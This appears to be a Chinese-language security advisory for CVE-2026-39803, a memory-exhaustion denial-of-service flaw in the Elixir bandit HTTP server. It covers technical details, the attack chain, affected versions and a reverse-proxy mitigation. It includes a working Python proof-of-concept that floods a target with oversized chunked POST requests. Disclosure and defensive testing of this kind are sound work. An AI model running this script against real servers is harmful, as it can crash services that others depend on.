CVE-2026-39803 CVSS 7.5 高危

CVE-2026-39803 bandit资源耗尽漏洞

披露日期: 2026-05-13

来源: 6b3ad84c-e1a6-4bf7-a703-f496b71e49db

漏洞信息

漏洞编号

CVE-2026-39803

漏洞类型

拒绝服务

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

bandit

漏洞概述

该漏洞存在于 mtrudel 开发的 bandit 库中，源于 HTTP/1 接口处理分块传输请求时未正确限制资源分配。未经身份验证的远程攻击者可发送恶意构造的大体积分块 POST 请求，导致服务器内存耗尽并崩溃，从而引发拒绝服务。此漏洞影响了 1.4.0 至 1.11.1 之前的所有版本。

技术细节

漏洞位于 `lib/bandit/http1/socket.ex` 的 `read_data/2` 函数中。在处理 HTTP/1 分块请求体时，该函数忽略了调用者传入的 `:length` 限制参数。正常流程应将累积正文限制在配置范围内（如 Plug.Parsers 默认的 8MB），但受影响代码将接收到的每个块无条件缓冲到 iolist 中，并将整个正文实现为单个二进制文件。由于该函数总是返回成功状态，调用者无法介入返回 413 响应。Plug.Parsers 在路由和认证前运行，攻击者无需凭证即可通过向任意路径发送超大分块 POST 请求，导致 BEAM 进程内存耗尽并被 OOM Killer 终止。

攻击链分析

STEP 1

探测

攻击者识别目标服务器运行的是受影响版本的 bandit 库（通常基于 Elixir/Phoenix 框架）。

STEP 2

利用

攻击者向目标服务器的任意路径发送一个特制的 HTTP POST 请求，该请求使用 Transfer-Encoding: chunked 编码，并包含极其巨大的数据块。

STEP 3

资源耗尽

服务器端 bandit 库在处理该请求时，忽略长度限制并将所有数据块加载到内存中，导致内存迅速耗尽。

STEP 4

拒绝服务

操作系统 OOM Killer 检测到内存不足并强制终止 BEAM 进程，导致服务不可用。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import socket
import sys

def send_chunked_attack(host, port, path="/", chunk_size=1024*100, chunk_count=10000):
    """
    PoC for CVE-2026-39803
    Sends a large chunked POST request to exhaust memory on the target server.
    """
    payload = b"A" * chunk_size
    
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((host, port))
        
        # Send HTTP headers with Transfer-Encoding: chunked
        headers = f"POST {path} HTTP/1.1\r\n"
        headers += f"Host: {host}\r\n"
        headers += "Accept: */*\r\n"
        headers += "Transfer-Encoding: chunked\r\n"
        headers += "\r\n"
        
        s.send(headers.encode())
        
        # Send malicious chunks
        for i in range(chunk_count):
            # Send chunk size in hex
            s.send(f"{hex(chunk_size)[2:]}\r\n".encode())
            # Send chunk data
            s.send(payload)
            s.send("\r\n".encode())
            print(f"Sent chunk {i+1}/{chunk_count}")
            
        # Send final chunk to terminate
        s.send(b"0\r\n\r\n")
        print("Attack payload sent. Server may run out of memory.")
        
    except Exception as e:
        print(f"Error: {e}")
    finally:
        s.close()

if __name__ == "__main__":
    # Usage: python script.py <target_ip> <port>
    target_ip = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"
    target_port = int(sys.argv[2]) if len(sys.argv) > 2 else 4000
    send_chunked_attack(target_ip, target_port)

影响范围

bandit >= 1.4.0, < 1.11.1

防御指南

临时缓解措施

若无法立即升级，建议在反向代理（如 Nginx）或负载均衡器层面配置最大请求体大小限制，拦截异常大的分块传输请求。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表